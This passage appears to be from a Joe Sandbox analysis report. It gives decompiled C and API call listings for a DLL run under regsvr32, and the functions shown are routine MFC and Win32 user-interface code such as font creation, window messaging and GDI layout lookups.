                                                                                                                					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
                                                                                                                					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
                                                                                                                					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
                                                                                                                					_t60 =  *(_t91 - 0x4c);
                                                                                                                					__eflags = _t60;
                                                                                                                					 *(_t91 - 4) = 1;
                                                                                                                					_t74 = _t60;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						_t74 =  ~_t60;
                                                                                                                					}
                                                                                                                					L1000CDFE(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                                                                                					 *(_t91 - 4) = 2;
                                                                                                                					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
                                                                                                                					_t64 = _t74 * 0xafc80;
                                                                                                                					asm("cdq");
                                                                                                                					_t86 = _t64 % _t80;
                                                                                                                					_t90 = _t90 + 0x64;
                                                                                                                					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
                                                                                                                					 *(_t91 - 0x70) = _t64 / _t80;
                                                                                                                					L10020F7B(_t90);
                                                                                                                					_t67 = _t91 - 0x78;
                                                                                                                					__imp__#420(_t67, 0x100a5fec, _t90,  *((intOrPtr*)(_t90 + 0x20)));
                                                                                                                					__eflags = _t67;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						 *_t90 = 0;
                                                                                                                					}
                                                                                                                					 *(_t91 - 4) = 1;
                                                                                                                					L1000CE52(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                                                                                					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
                                                                                                                					L100013E3( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
                                                                                                                				}
                                                                                                                				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x54)) = 0x10098308;
                                                                                                                				L1000CFF6(_t91 - 0x54);
                                                                                                                				return E10047739(_t74, 0, _t90);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1002BD54
                                                                                                                • GetObjectA.GDI32(1001E491,0000003C,?), ref: 1002BDA6
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1002BE16
                                                                                                                • OleCreateFontIndirect.OLEAUT32(00000020,100A5FEC), ref: 1002BE42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2429671754-3916222277
                                                                                                                • Opcode ID: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
                                                                                                                • Instruction ID: 8110959a6e54c0f51d5823ab9e749c0ccfc70fdb1bbb8e213e6bcc0a527dad41
                                                                                                                • Opcode Fuzzy Hash: c40c12fe3be4be559ea53c661c0170e3f5bd0dd14fd6b9e177c80991e0598783
                                                                                                                • Instruction Fuzzy Hash: C74157349016899EDB14CFE4C941ADCFBF4FF19340F50816AE599EB296EBB49A04CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100361C3(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t31;
                                                                                                                				void* _t37;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr* _t43;
                                                                                                                				void* _t44;
                                                                                                                				int _t45;
                                                                                                                				intOrPtr* _t48;
                                                                                                                				void* _t49;
                                                                                                                
                                                                                                                				_t42 = __ecx;
                                                                                                                				_t48 = __ecx;
                                                                                                                				_t41 = E10014BA7(__ecx);
                                                                                                                				_t50 = _t41;
                                                                                                                				if(_t41 == 0) {
                                                                                                                					E1000A069(_t41, _t42, _t44, _t48, _t50);
                                                                                                                				}
                                                                                                                				_t43 =  *((intOrPtr*)(_t48 + 0x80));
                                                                                                                				_t45 = _a4;
                                                                                                                				if(_t43 == 0) {
                                                                                                                					L4:
                                                                                                                					if(_a8 != 0xffff) {
                                                                                                                						__eflags = _t45;
                                                                                                                						if(_t45 == 0) {
                                                                                                                							L17:
                                                                                                                							_t22 = _t48 + 0xa8;
                                                                                                                							 *_t22 =  *(_t48 + 0xa8) & 0x00000000;
                                                                                                                							__eflags =  *_t22;
                                                                                                                							L18:
                                                                                                                							_t24 = _t41 + 0x3c;
                                                                                                                							 *_t24 =  *(_t41 + 0x3c) | 0x00000040;
                                                                                                                							__eflags =  *_t24;
                                                                                                                							L19:
                                                                                                                							_t31 =  *(_t48 + 0xa8);
                                                                                                                							if(_t31 ==  *((intOrPtr*)(_t48 + 0xac))) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t31 = E10013FEA(_t41, _t43, _t49, GetParent( *(_t48 + 0x20)));
                                                                                                                							if(_t31 == 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							return PostMessageA( *(_t48 + 0x20), 0x36a, 0, 0);
                                                                                                                						}
                                                                                                                						__eflags = _a8 & 0x00000810;
                                                                                                                						if((_a8 & 0x00000810) != 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						__eflags = _t45 - 0xf000 - 0x1ef;
                                                                                                                						if(_t45 - 0xf000 > 0x1ef) {
                                                                                                                							__eflags = _t45 - 0xff00;
                                                                                                                							if(_t45 < 0xff00) {
                                                                                                                								L14:
                                                                                                                								 *(_t48 + 0xa8) = _t45;
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							 *(_t48 + 0xa8) = 0xef1f;
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t45 = (_t45 + 0xffff1000 >> 4) + 0xef00;
                                                                                                                						__eflags = _t45;
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					 *(_t48 + 0x3c) =  *(_t48 + 0x3c) & 0xffffffbf;
                                                                                                                					if( *((intOrPtr*)(_t41 + 0x68)) != 0) {
                                                                                                                						 *(_t48 + 0xa8) = 0xe002;
                                                                                                                					} else {
                                                                                                                						 *(_t48 + 0xa8) = 0xe001;
                                                                                                                					}
                                                                                                                					SendMessageA( *(_t48 + 0x20), 0x362,  *(_t48 + 0xa8), 0);
                                                                                                                					_t43 = _t48;
                                                                                                                					_t37 =  *((intOrPtr*)( *_t48 + 0x154))();
                                                                                                                					if(_t37 != 0) {
                                                                                                                						UpdateWindow( *(_t37 + 0x20));
                                                                                                                					}
                                                                                                                					goto L19;
                                                                                                                				} else {
                                                                                                                					_t31 =  *((intOrPtr*)( *_t43 + 0x7c))(_t45, _a8, _a12);
                                                                                                                					if(_t31 != 0) {
                                                                                                                						L22:
                                                                                                                						return _t31;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10036235
                                                                                                                • UpdateWindow.USER32 ref: 1003624C
                                                                                                                • GetParent.USER32(?), ref: 100362B4
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 100362D0
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                                                                                                                • String ID: @
                                                                                                                • API String ID: 33412044-2766056989
                                                                                                                • Opcode ID: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
                                                                                                                • Instruction ID: ee07a5994753447d1fba64953ed39fe2121cc4a9fa9f8d6d0d49d64af206bfb4
                                                                                                                • Opcode Fuzzy Hash: e55ebaaaa6bcd21f69dba378561192110661c72613a9bde20aad739576272f48
                                                                                                                • Instruction Fuzzy Hash: 7C31A231600F01AFE7619F20CC84B9B77E4FF49396F12C528E99A9E1A0CB71A8548B10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10037E19(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t62;
                                                                                                                				intOrPtr _t64;
                                                                                                                				void* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t62 = __edx;
                                                                                                                				_t52 = __ebx;
                                                                                                                				_push(0x28);
                                                                                                                				E100476B6(0x10090c8a, __ebx, __edi, __esi);
                                                                                                                				_t64 =  *((intOrPtr*)(_t68 + 8));
                                                                                                                				_t67 = __ecx;
                                                                                                                				L1000140B(_t68 - 0x34, E100184C0());
                                                                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                                				if((E100177F8(__ecx) & 0x00004000) == 0) {
                                                                                                                					_t56 = _t68 - 0x34;
                                                                                                                					E1001069E(_t68 - 0x34, __ecx + 0xc4);
                                                                                                                					if(_t64 != 0) {
                                                                                                                						E1000B029(_t68 - 0x34, " - ");
                                                                                                                						_t56 = _t68 - 0x34;
                                                                                                                						E1000B029(_t68 - 0x34, _t64);
                                                                                                                						_t38 =  *((intOrPtr*)(_t67 + 0x58));
                                                                                                                						if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
                                                                                                                							E1004C19A(_t68 - 0x30, 0x20, ":%d", _t38);
                                                                                                                							_t56 = _t68 - 0x34;
                                                                                                                							E1000B029(_t68 - 0x34, _t68 - 0x30);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L9:
                                                                                                                					_t65 =  *((intOrPtr*)(_t68 - 0x34));
                                                                                                                					E100219F5(_t56, _t62,  *((intOrPtr*)(_t67 + 0x20)),  *((intOrPtr*)(_t68 - 0x34)));
                                                                                                                					L100013E3(_t65 - 0x10, _t62);
                                                                                                                					return E10047739(_t52, _t65, _t67);
                                                                                                                				}
                                                                                                                				if(_t64 == 0) {
                                                                                                                					L5:
                                                                                                                					_t56 = _t68 - 0x34;
                                                                                                                					E1001069E(_t68 - 0x34, _t67 + 0xc4);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				E1000B029(_t68 - 0x34, _t64);
                                                                                                                				_t46 =  *((intOrPtr*)(_t67 + 0x58));
                                                                                                                				if( *((intOrPtr*)(_t67 + 0x58)) > 0) {
                                                                                                                					E1004C19A(_t68 - 0x30, 0x20, ":%d", _t46);
                                                                                                                					E1000B029(_t68 - 0x34, _t68 - 0x30);
                                                                                                                				}
                                                                                                                				E1000B029(_t68 - 0x34, " - ");
                                                                                                                				goto L5;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10037E20
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • _swprintf.LIBCMT ref: 10037E69
                                                                                                                  • Part of subcall function 1004C19A: __vsprintf_s_l.LIBCMT ref: 1004C1AD
                                                                                                                  • Part of subcall function 1000B029: _strlen.LIBCMT ref: 1000B03A
                                                                                                                • _swprintf.LIBCMT ref: 10037ED7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _swprintf$H_prolog3_LongWindow__vsprintf_s_l_strlen
                                                                                                                • String ID: - $:%d
                                                                                                                • API String ID: 1012054303-2359489159
                                                                                                                • Opcode ID: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
                                                                                                                • Instruction ID: fd64e6a11f349006b99ad3e3af546d366868ae2af92203d1d57b90f4a38e4adb
                                                                                                                • Opcode Fuzzy Hash: 63244a309c4e1ce2be867d77882b35079c284ff71caf3314a712287f9dfc3e77
                                                                                                                • Instruction Fuzzy Hash: 6E21AF7A801208AAE721EBA0ED56EFF73B9FF14341F500529B516A7195EF30BE08CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E10011243(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v20;
                                                                                                                				int _t14;
                                                                                                                				int _t18;
                                                                                                                				intOrPtr* _t23;
                                                                                                                				void* _t25;
                                                                                                                
                                                                                                                				if(L10010FF9() == 0) {
                                                                                                                					if(_a4 != 0x12340042) {
                                                                                                                						L9:
                                                                                                                						_t14 = 0;
                                                                                                                						L10:
                                                                                                                						return _t14;
                                                                                                                					}
                                                                                                                					_t23 = _a8;
                                                                                                                					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                                						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                                						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                                						_t18 = GetSystemMetrics(1);
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						 *(_t23 + 0x10) = _t18;
                                                                                                                						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                                						if( *_t23 >= 0x48) {
                                                                                                                							E1004BFF9(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                                						}
                                                                                                                						_t14 = 1;
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return  *0x100bda28(_a4, _a8);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10011281
                                                                                                                • GetSystemMetrics.USER32 ref: 10011299
                                                                                                                • GetSystemMetrics.USER32 ref: 100112A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$InfoParameters
                                                                                                                • String ID: B$DISPLAY
                                                                                                                • API String ID: 3136151823-3316187204
                                                                                                                • Opcode ID: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
                                                                                                                • Instruction ID: 97ef3e79cf9e065ce80cb2f78251b648008c7c77418a083fa39792e940d8eb31
                                                                                                                • Opcode Fuzzy Hash: 8068e71f5c3a869b75398deb8be0d862eb1a0e925b55f4283e17b1e2f9b4c0f4
                                                                                                                • Instruction Fuzzy Hash: DE11A371A00325ABDF15DFA5DC84ADBBBA8EF06790B014061FD05EE446D2B1D890CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001B7F6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                                				void* __edi;
                                                                                                                				struct HWND__* _t10;
                                                                                                                				struct HWND__* _t12;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				int _t19;
                                                                                                                				void* _t21;
                                                                                                                				void* _t25;
                                                                                                                				struct HWND__** _t26;
                                                                                                                				void* _t27;
                                                                                                                
                                                                                                                				_t25 = __edx;
                                                                                                                				_t21 = __ebx;
                                                                                                                				_t26 = _a4;
                                                                                                                				_t27 = __ecx;
                                                                                                                				if(E10011BA4(__ecx, __eflags, _t26) == 0) {
                                                                                                                					_t10 = E10014BA7(__ecx);
                                                                                                                					__eflags = _t10;
                                                                                                                					if(_t10 == 0) {
                                                                                                                						L5:
                                                                                                                						__eflags = _t26[1] - 0x100;
                                                                                                                						if(_t26[1] != 0x100) {
                                                                                                                							L13:
                                                                                                                							return E10012240(_t26);
                                                                                                                						}
                                                                                                                						_t12 = _t26[2];
                                                                                                                						__eflags = _t12 - 0x1b;
                                                                                                                						if(_t12 == 0x1b) {
                                                                                                                							L8:
                                                                                                                							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_t14 = E10021C2F(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                                							__eflags = _t14;
                                                                                                                							if(_t14 == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                                							__eflags = _t15;
                                                                                                                							if(_t15 == 0) {
                                                                                                                								L12:
                                                                                                                								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t19 = IsWindowEnabled(_t15);
                                                                                                                							__eflags = _t19;
                                                                                                                							if(_t19 == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _t12 - 3;
                                                                                                                						if(_t12 != 3) {
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags =  *(_t10 + 0x68);
                                                                                                                					if( *(_t10 + 0x68) == 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Edit
                                                                                                                • API String ID: 0-554135844
                                                                                                                • Opcode ID: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
                                                                                                                • Instruction ID: 07053561f4277099a3d04e1c325a2f95bcac334b9408a2c0d6db1208d980b8c9
                                                                                                                • Opcode Fuzzy Hash: a05c97695a32eb97e0a893a7320ccb4d8a6aa492ae763224ec430d27a9d8552c
                                                                                                                • Instruction Fuzzy Hash: 4201C035600A02ABEB14DA258C45B9AB2ECEF41FD5F514528F442DA0B0DF70ECD0C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E100190D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t20;
                                                                                                                				intOrPtr _t26;
                                                                                                                				void* _t32;
                                                                                                                				void* _t33;
                                                                                                                
                                                                                                                				_push(4);
                                                                                                                				E1004764D(0x1008ecee, __ebx, __edi, __esi);
                                                                                                                				_t32 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t33 - 0x10)) = 0;
                                                                                                                				E10019074(__ecx, 0x20, _t33 - 0x10);
                                                                                                                				if( *((intOrPtr*)(_t33 + 8)) != 0) {
                                                                                                                					_t36 =  *((intOrPtr*)(_t33 - 0x10));
                                                                                                                					if( *((intOrPtr*)(_t33 - 0x10)) == 0) {
                                                                                                                						_t26 = E10009F14(_t36, 0x20);
                                                                                                                						 *((intOrPtr*)(_t33 - 0x10)) = _t26;
                                                                                                                						_t37 = _t26;
                                                                                                                						 *(_t33 - 4) = 0;
                                                                                                                						if(_t26 == 0) {
                                                                                                                							_t20 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_push(0x1e);
                                                                                                                							_push( *((intOrPtr*)(_t33 + 8)));
                                                                                                                							_push("File%d");
                                                                                                                							_push("Recent File List");
                                                                                                                							_push(0);
                                                                                                                							_t20 = E100269C0(__ebx, _t26, 0, _t32, _t37);
                                                                                                                						}
                                                                                                                						 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t32 + 0x88)) = _t20;
                                                                                                                						 *((intOrPtr*)( *_t20 + 0x10))();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t32 + 0x94)) = E10025F92(_t32, "Settings", "PreviewPages", 0);
                                                                                                                				return E10047725(_t17);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100190DB
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                  • Part of subcall function 100269C0: __EH_prolog3.LIBCMT ref: 100269C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$_malloc
                                                                                                                • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                                • API String ID: 1683881009-526586445
                                                                                                                • Opcode ID: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
                                                                                                                • Instruction ID: e2bdf456994b232c3ec09ff3447ed3ecde582c8e3873aa901323e6cb6196a485
                                                                                                                • Opcode Fuzzy Hash: 102062f58e8eb2ce84fc7bcee302e76a552dd2902e429c62ac920ed42ba2649f
                                                                                                                • Instruction Fuzzy Hash: 6C01A235E4060ABBCB15DFB48C15EBE76B1FF84750F20852EF2699B181DB7095809751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000C193(void* __ecx, intOrPtr _a4) {
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                				_Unknown_base(*)()* _t5;
                                                                                                                				void* _t9;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t10 = __ecx;
                                                                                                                				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                                                                				_t9 = 0;
                                                                                                                				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                                                                				if(_t5 == 0) {
                                                                                                                					if(_a4 != 0) {
                                                                                                                						_t9 = 0xffffffff;
                                                                                                                						SetLastError(0x78);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,1004444D,00000000), ref: 1000C1CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$SetLayout
                                                                                                                • API String ID: 4275029093-2147214759
                                                                                                                • Opcode ID: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
                                                                                                                • Instruction ID: 94626ab8e3bfee5670fa724d826468d4054a6831626c432c528c060394332660
                                                                                                                • Opcode Fuzzy Hash: 4e63dc2d4395020bca6b567e20ec15d9c3cf4b3b9062aa123a5f3a41c6494be1
                                                                                                                • Instruction Fuzzy Hash: C0E020331402107BE650971A4D88CCE3B93DBC3371B598615FB39C10A4C7398C559B20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000C15D(signed int __ecx) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				signed int _t7;
                                                                                                                				signed int _t8;
                                                                                                                
                                                                                                                				_t7 = __ecx;
                                                                                                                				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                                                                				if(_t3 == 0) {
                                                                                                                					_t8 = _t7 | 0xffffffff;
                                                                                                                					SetLastError(0x78);
                                                                                                                				} else {
                                                                                                                					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                                                                				}
                                                                                                                				return _t8;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1000C189
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: GDI32.DLL$GetLayout
                                                                                                                • API String ID: 4275029093-2396518106
                                                                                                                • Opcode ID: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
                                                                                                                • Instruction ID: 0ec2beb3e0e8ea4de9f101b9fc61ac14c10b2d7aa20409389975f5a3b332688b
